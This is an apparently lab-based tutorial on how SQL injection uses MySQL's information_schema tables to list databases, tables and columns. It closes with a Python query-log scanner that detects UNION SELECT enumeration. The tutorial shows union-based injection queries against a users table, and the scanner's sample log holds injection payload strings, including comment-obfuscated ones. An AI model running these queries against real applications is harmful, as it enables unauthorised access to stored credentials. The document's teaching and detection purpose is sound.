When learning SQL injection, the example that comes up most often is the classic PHP + MySQL combination. Within that, one thing mentioned again and again is the built-in database that ships with MySQL >= 5.0: information_schema.
A quick look at what the information_schema database contains.
The two tables of interest during injection are tables and columns:
```
mysql> use information_schema
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| INNODB_BUFFER_PAGE                    |
| INNODB_TRX                            |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_LOCK_WAITS                     |
| INNODB_CMPMEM                         |
| INNODB_CMP                            |
| INNODB_LOCKS                          |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_BUFFER_PAGE_LRU                |
+---------------------------------------+
40 rows in set (0.00 sec)
```
The tables table stores the mapping between databases and table names, in the fields table_schema and table_name respectively.
With select table_schema, table_name from tables you can list the database/table pairs for the entire MySQL instance. Note that this returns everything; to restrict it to one database, add a where condition:
```
mysql> select table_schema, table_name from tables where table_schema='security';
+--------------+------------+
| table_schema | table_name |
+--------------+------------+
| security     | emails     |
| security     | referers   |
| security     | uagents    |
| security     | users      |
+--------------+------------+
4 rows in set (0.00 sec)
```
The other table, columns, provides three fields: table_schema, table_name and column_name:
```
mysql> select table_schema, table_name, column_name from columns where table_schema='security' and table_name='users';
+--------------+------------+-------------+
| table_schema | table_name | column_name |
+--------------+------------+-------------+
| security     | users      | id          |
| security     | users      | username    |
| security     | users      | password    |
+--------------+------------+-------------+
3 rows in set (0.01 sec)
```
Carried into a union query, the same lookup looks like this:
```
mysql> select id, username, password from users where id = 1 union select table_schema, table_name, column_name from information_schema.columns where table_schema=database() and table_name='users';
+----------+----------+----------+
| id       | username | password |
+----------+----------+----------+
| 1        | Dumb     | Dumb     |
| security | users    | id       |
| security | users    | username |
| security | users    | password |
+----------+----------+----------+
4 rows in set (0.00 sec)
```
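From the defender's side, the union query above has a recognisable shape in the MySQL general query log: a statement against an application table with a UNION SELECT appended that reads from information_schema. The following scanner is an added example, not code from the original post; the log lines, connection ids and line layout are constructed for it, and it deliberately leaves plain administrative reads of information_schema (no union) unflagged.

```python
import re
from typing import Dict, List

# Constructed sample lines in the style of the MySQL general query log
# (layout: timestamp, connection id, command, statement); the entries are made up.
SAMPLE_LOG = """\
2024-01-01T10:00:00Z   12 Query   select id, username, password from users where id = 1
2024-01-01T10:00:01Z   12 Query   select id, username, password from users where id = 1 union select table_schema, table_name, column_name from information_schema.columns where table_schema=database() and table_name='users'
2024-01-01T10:00:02Z   13 Query   select table_schema, table_name from information_schema.tables where table_schema='security'
2024-01-01T10:00:03Z   14 Query   select id, username, password from users where id = -1 UNION/**/SELECT table_schema,table_name,column_name FROM information_schema.columns
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.*)$")
UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b")
SCHEMA_REF = re.compile(r"\binformation_schema\s*\.\s*(?P<tbl>\w+)")
FIRST_FROM = re.compile(r"\bfrom\s+`?(?P<tbl>\w+)`?")


def normalize(sql: str) -> str:
    """Lower-case the statement, replace /* */ comments with a space, collapse whitespace."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    return re.sub(r"\s+", " ", sql).strip().lower()


def find_schema_enumeration(log_text: str) -> List[Dict[str, str]]:
    """Flag statements where a UNION SELECT pulls rows out of information_schema."""
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        sql = normalize(m.group("sql"))
        union = UNION_SELECT.search(sql)
        if not union:
            continue  # direct reads of information_schema (DBA tooling) are not flagged
        ref = SCHEMA_REF.search(sql, union.end())
        if not ref:
            continue  # a union between two application tables is out of scope here
        carrier = FIRST_FROM.search(sql)  # the application table the query was meant for
        findings.append({
            "ts": m.group("ts"),
            "conn": m.group("conn"),
            "carrier_table": carrier.group("tbl") if carrier else "",
            "schema_table": ref.group("tbl"),
        })
    return findings


if __name__ == "__main__":
    for f in find_schema_enumeration(SAMPLE_LOG):
        print(f)
```

The same match can be applied to request parameters at the web tier, but the query log view is the one that shows the carrier table and the information_schema table actually reached.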